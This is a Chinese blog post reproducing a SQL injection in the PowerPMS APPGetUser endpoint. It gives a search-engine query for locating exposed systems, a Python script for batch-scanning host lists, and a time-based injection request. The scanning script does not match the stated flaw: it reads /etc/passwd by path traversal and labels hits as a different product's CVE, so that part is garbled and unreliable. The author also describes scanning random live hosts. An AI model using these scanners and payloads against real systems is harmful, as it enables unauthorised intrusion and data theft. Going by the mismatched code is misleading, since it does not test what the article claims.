【漏洞复现】普华-PowerPMS APPGetUser SQL注入漏洞

声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

PowerPMS 是一款综合性的企业管理系统,它集成了财务管理、销售管理、采购管理、仓储管理以及项目管理等多个功能模块。该系统采用模块化设计,可以根据企业的具体需求进行灵活的配置和二次开发。PowerPMS 拥有用户友好的界面和流畅的操作流程,能够帮助企业高效地管理各种业务活动。此外,系统还支持多公司、多仓库、多币种等高级功能,能够满足不同规模企业的管理需求。其接口**/APPAccount/APPGetUser?name=1**存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、资产收集

1.使用网络空间测绘引擎搜索

**鹰图检索:"**PowerPMS用户登录"

2.使用poc批量扫描

python 复制代码
import urllib.request
import urllib3
from urllib.parse import urljoin,quote
import argparse
import ssl
import re

# 禁用SSL证书验证,允许不安全的请求
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    # 读取文件中的URL列表
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    # 移除URL末尾的斜杠
    url = url.rstrip("/")
    # 构造目标URL,尝试访问API文档中的敏感文件etc/passwd
    target = url+"/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
    }
    try:
        # 发送GET请求
        response = urllib.request.Request(target, headers=headers, method="GET", unverifiable=True)
        res = urllib.request.urlopen(response)
        status_code = res.getcode()
        content = res.read().decode()
        # 检查响应状态码和内容,判断是否成功读取到etc/passwd文件
        if status_code == 200 and 'root:' in content and 'var' in content:
            print(f"\033[31mDiscovered:{url}: Bazaar_CVE-2024-40348_ArbiraryFileRead!\033[0m")
            return True
    except Exception as e:
        print(e)

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        # 如果提供了单个URL,直接检查
        check(url)
    elif txt:
        # 如果提供了包含多个URL的文件,逐个检查
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        # 如果没有提供任何参数,显示帮助信息
        print("help")

cmd运行poc脚本:python poc.py -f host.txt

随机寻找的幸运儿

三、漏洞复现

1.构造数据包

1.构造数据包:

html 复制代码
GET /APPAccount/APPGetUser?name=1');WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host:x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close

2.数据包分析

  1. 请求行(Request Line):

    • 方法:GET
    • URI:/APPAccount/APPGetUser?name=1');WAITFOR+DELAY+'0:0:5'--
    • HTTP版本:HTTP/1.1
  2. 请求头(Headers):

    • Host:x.x.x.x
    • User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
    • Connection:close
  • 请求行中的方法是GET,表示这是一个获取资源的请求。
  • URI中包含了一个SQL注入攻击的尝试,其中';WAITFOR DELAY '0:0:5'--是SQL注入的一部分,用于在数据库中执行延迟操作。这种攻击可能会导致服务器响应缓慢或拒绝服务。
  • 请求头中的Host指定了目标服务器的地址。
  • User-Agent提供了客户端浏览器的信息,包括操作系统、浏览器类型和版本等。
  • Connection设置为close,表示客户端希望在收到响应后立即关闭连接。

3.结束跑路

1.构造数据包,延时5S

2.构造数据包,延时3秒

**每篇一言:**风月折断杨柳枝,琴瑟朝露挥掷成诗。

相关推荐
GoFly开发者2 小时前
Go语言开发框架GoFlyGen新增 网站安全助手 插件,帮助开发者提供应用安全防护,保障平台系统数据安全。
网络·安全
笺落彼岸2 小时前
SpringBoot3 JDK17集成proguard实现混淆打包
安全·https
阿演2 小时前
DataDjinn v0.2.11:SQL 编辑、AI 协作和表格操作继续打磨
数据库·人工智能·sql
happyprince2 小时前
07_NVIDIA_ModelOpt-Recipe配方系统
网络·modelopt
甄同学2 小时前
第十七篇:Bash Executor命令执行器,安全运行Shell命令
开发语言·安全·bash
h3guang Official2 小时前
K8s安全实战:从漏洞靶场到红蓝对抗
安全·容器·kubernetes
韦胖漫谈IT3 小时前
Apple M3 Max 与 Apple M5 Max 对比:本地算力的新旧王者之争
网络·人工智能·macos·transformer
智脑API平台3 小时前
Codex 国内使用会封号吗?账号安全、中转站和合规边界说明
数据库·redis·缓存
l1t3 小时前
duckdb 1.6dev新增的.manual命令
开发语言·数据库
treesforest3 小时前
做内容平台,IP地址精准定位和IP高精度定位查询怎么帮我们提升用户留存
网络·网络协议·tcp/ip